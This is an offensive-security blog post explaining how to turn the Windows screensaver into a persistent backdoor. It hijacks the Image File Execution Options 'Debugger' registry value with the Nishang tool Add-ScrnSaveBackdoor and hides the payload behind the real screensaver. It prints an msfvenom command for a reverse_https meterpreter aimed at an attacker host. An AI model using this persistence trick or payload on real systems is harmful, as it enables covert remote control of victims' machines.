Saturday, February 28, 2015

Using Windows Screensaver as a Backdoor with PowerShell

I came across this interesting post about bypassing Windows Lock Screen via Flash Screensaver. While bypassing the lock screen is useful, the method mentioned there needs physical access to the target. This feature of Windows could be used for much more fun without physical access. The fact that Screensaver would run our payload whenever the target would be idle makes it much useful as a backdoor. 
Lets see!

Using below simple PowerShell command, from an elevated shell, we can run an executable whenever Screensaver timeout occurs, assuming that the Screensaver in use is the built-in Ribbons.scr
And when the timeout occurs we have a command prompt (which may keep running in a loop). Fun, but needs physical access!

To quickly test screensaver execution, I used MonitorES from here.

Using PowerShell, we can do some neat stuff with this. For example, using the below one liner we can download and execute scripts. We can always change the script on the webserver so a new script could be executed everytime the screensaver starts.
Above could be used to execute PowerShell scripts and modules.

Now, to make it less suspicious for a user, we should be able to launch the screensaver alongwith our command/script. Let me give you, Add-ScrnSaveBackdoor.

Add-ScrnSaveBackdoor

It reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.

A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload. When the payload is executed, the screensaver also runs after it to make it appear legit.

Below command shows how to use Add-ScrnSaveBackdoor to execute FireBuster from Nishang for Egress Testing. The FireListener must be started on the attacker's machine:

Below command executes HTTP-Backdoor from Powerpreter:

And use the below command to execute an in-memory meterpreter in PowerShell format generated using msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell):
Aaaand...

Bingo! With the help of PowerShell, we used this method which required physical access for remote access. It works fine with the "On resume, display logon screen" setting. We can always change contents of the script URL to execute different scripts using the same backdoor.

The source for Add-ScrnSaveBackdoor could be found in Nishang github repo.

Below video shows a walkthrough of the source code and shows Add-ScrnSaveBackdoor in action to pop a reverse_https meterpreter.

Meh!

Administrative  privilege (elevated shell) is required to use Add-ScrnSaveBackdoor.

SCRNSAVE.EXE could be used for evil is known for much longer time. http://www.securityfocus.com/archive/1/434926/30/0/threaded

"Image File execution Options" could be used for evil is also known. So AV *may* catch it.

This setting "can be superceded by the No screen saver Group Policy"



Hope you enjoyed this! Please leave comments and feedback.

If you like this and want to learn more, please checkout my two day training "PowerShell for Hackers" at Troopers 15 on 16th-17th March (https://www.troopers.de/events/troopers15/292_powershell_for_hackers/) or other trainings I am doing at various conferences in the right pane.